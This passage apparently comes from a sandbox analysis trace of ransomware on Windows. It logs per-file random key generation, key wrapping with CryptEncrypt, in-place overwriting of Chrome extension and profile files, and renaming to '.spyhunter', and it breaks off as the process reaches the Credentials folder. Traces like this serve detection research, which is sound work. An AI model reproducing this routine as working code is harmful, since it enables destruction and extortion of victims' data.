[0137.564] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3b8*=0x30) returned 1 [0137.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0137.564] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.564] GetProcessHeap () returned 0x2c0000 [0137.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.565] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f37c*=0x269, lpOverlapped=0x0) returned 1 [0137.572] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.572] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x57f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f37c*=0x269, lpOverlapped=0x0) returned 1 [0137.572] GetProcessHeap () returned 0x2c0000 [0137.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.573] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.574] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f37c, lpOverlapped=0x0 | out: lpBuffer=0x57f3bc*, lpNumberOfBytesWritten=0x57f37c*=0x4, lpOverlapped=0x0) returned 1 [0137.575] WriteFile (in: hFile=0x18c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f37c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f37c*=0x30, lpOverlapped=0x0) returned 1 [0137.575] CloseHandle (hObject=0x18c) returned 1 [0137.575] GetProcessHeap () returned 0x2c0000 [0137.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.575] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.spyhunter") returned 172 [0137.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.spyhunter")) returned 1 [0137.576] GetProcessHeap () returned 0x2c0000 [0137.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.576] GetProcessHeap () returned 0x2c0000 [0137.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0137.576] GetProcessHeap () returned 0x2c0000 [0137.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1acb8 | out: hHeap=0x2c0000) returned 1 [0137.578] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3b8 | out: pbBuffer=0x57f3b8) returned 1 [0137.578] GetProcessHeap () returned 0x2c0000 [0137.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0137.578] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3b0*=0x30) returned 1 [0137.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0137.579] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.579] GetProcessHeap () returned 0x2c0000 [0137.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.579] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f374*=0x2c1, lpOverlapped=0x0) returned 1 [0137.607] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffd3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.607] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f374*=0x2c1, lpOverlapped=0x0) returned 1 [0137.607] GetProcessHeap () returned 0x2c0000 [0137.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.607] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.607] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x57f3b4*, lpNumberOfBytesWritten=0x57f374*=0x4, lpOverlapped=0x0) returned 1 [0137.608] WriteFile (in: hFile=0x18c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f374*=0x30, lpOverlapped=0x0) returned 1 [0137.608] CloseHandle (hObject=0x18c) returned 1 [0137.608] GetProcessHeap () returned 0x2c0000 [0137.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.608] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.spyhunter") returned 169 [0137.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0137.609] GetProcessHeap () returned 0x2c0000 [0137.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.609] GetProcessHeap () returned 0x2c0000 [0137.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0137.609] GetProcessHeap () returned 0x2c0000 [0137.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80060 | out: hHeap=0x2c0000) returned 1 [0137.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3b8 | out: pbBuffer=0x57f3b8) returned 1 [0137.609] GetProcessHeap () returned 0x2c0000 [0137.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0137.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3b0*=0x30) returned 1 [0137.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0138.078] StrStrW (lpFirst="topbar_floating_button_close.png", lpSrch=".txt") returned 0x0 [0138.078] GetProcessHeap () returned 0x2c0000 [0138.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.078] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f374*=0xfc, lpOverlapped=0x0) returned 1 [0138.079] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.079] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f374*=0xfc, lpOverlapped=0x0) returned 1 [0138.098] GetProcessHeap () returned 0x2c0000 [0138.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.098] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.098] WriteFile (in: hFile=0x178, lpBuffer=0x57f3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x57f3b4*, lpNumberOfBytesWritten=0x57f374*=0x4, lpOverlapped=0x0) returned 1 [0138.108] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f374, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f374*=0x30, lpOverlapped=0x0) returned 1 [0138.108] CloseHandle (hObject=0x178) returned 1 [0138.108] GetProcessHeap () returned 0x2c0000 [0138.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.108] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.spyhunter") returned 183 [0138.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.spyhunter")) returned 1 [0138.109] GetProcessHeap () returned 0x2c0000 [0138.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.110] GetProcessHeap () returned 0x2c0000 [0138.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.110] GetProcessHeap () returned 0x2c0000 [0138.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb82b8 | out: hHeap=0x2c0000) returned 1 [0138.111] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3b0 | out: pbBuffer=0x57f3b0) returned 1 [0138.111] GetProcessHeap () returned 0x2c0000 [0138.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.111] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3a8*=0x30) returned 1 [0138.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.114] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0138.114] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0138.114] GetProcessHeap () returned 0x2c0000 [0138.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.114] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f36c*=0x2800, lpOverlapped=0x0) returned 1 [0138.140] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.140] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f36c*=0x2800, lpOverlapped=0x0) returned 1 [0138.140] GetProcessHeap () returned 0x2c0000 [0138.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.140] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.140] WriteFile (in: hFile=0x178, lpBuffer=0x57f3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f36c, lpOverlapped=0x0 | out: lpBuffer=0x57f3ac*, lpNumberOfBytesWritten=0x57f36c*=0x4, lpOverlapped=0x0) returned 1 [0138.211] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f36c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f36c*=0x30, lpOverlapped=0x0) returned 1 [0138.211] CloseHandle (hObject=0x178) returned 1 [0138.211] GetProcessHeap () returned 0x2c0000 [0138.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f82de8 [0138.211] wnsprintfW (in: pszDest=0x2f82de8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.spyhunter") returned 174 [0138.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0138.212] GetProcessHeap () returned 0x2c0000 [0138.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82de8 | out: hHeap=0x2c0000) returned 1 [0138.212] GetProcessHeap () returned 0x2c0000 [0138.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.212] GetProcessHeap () returned 0x2c0000 [0138.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8540 | out: hHeap=0x2c0000) returned 1 [0138.223] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3a8 | out: pbBuffer=0x57f3a8) returned 1 [0138.223] GetProcessHeap () returned 0x2c0000 [0138.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.223] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f3a0*=0x30) returned 1 [0138.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0138.224] StrStrW (lpFirst="2B04.tmp", lpSrch=".txt") returned 0x0 [0138.224] GetProcessHeap () returned 0x2c0000 [0138.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.224] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f364, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f364*=0x0, lpOverlapped=0x0) returned 1 [0138.224] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.224] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57f364, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f364*=0x0, lpOverlapped=0x0) returned 1 [0138.224] GetProcessHeap () returned 0x2c0000 [0138.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.224] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.224] WriteFile (in: hFile=0x178, lpBuffer=0x57f3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f364, lpOverlapped=0x0 | out: lpBuffer=0x57f3a4*, lpNumberOfBytesWritten=0x57f364*=0x4, lpOverlapped=0x0) returned 1 [0138.226] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f364, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f364*=0x30, lpOverlapped=0x0) returned 1 [0138.226] CloseHandle (hObject=0x178) returned 1 [0138.226] GetProcessHeap () returned 0x2c0000 [0138.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f82de8 [0138.226] wnsprintfW (in: pszDest=0x2f82de8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.spyhunter") returned 115 [0138.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp.spyhunter")) returned 1 [0138.302] GetProcessHeap () returned 0x2c0000 [0138.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82de8 | out: hHeap=0x2c0000) returned 1 [0138.302] GetProcessHeap () returned 0x2c0000 [0138.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.302] GetProcessHeap () returned 0x2c0000 [0138.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4aa10 | out: hHeap=0x2c0000) returned 1 [0138.304] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f398 | out: pbBuffer=0x57f398) returned 1 [0138.305] GetProcessHeap () returned 0x2c0000 [0138.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f390*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f390*=0x30) returned 1 [0138.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0138.305] GetProcessHeap () returned 0x2c0000 [0138.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.305] GetProcessHeap () returned 0x2c0000 [0138.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4a18 | out: hHeap=0x2c0000) returned 1 [0138.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f398 | out: pbBuffer=0x57f398) returned 1 [0138.305] GetProcessHeap () returned 0x2c0000 [0138.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f390*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f390*=0x30) returned 1 [0138.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\." (normalized: "c:\\users\\5p5nrgjn0js 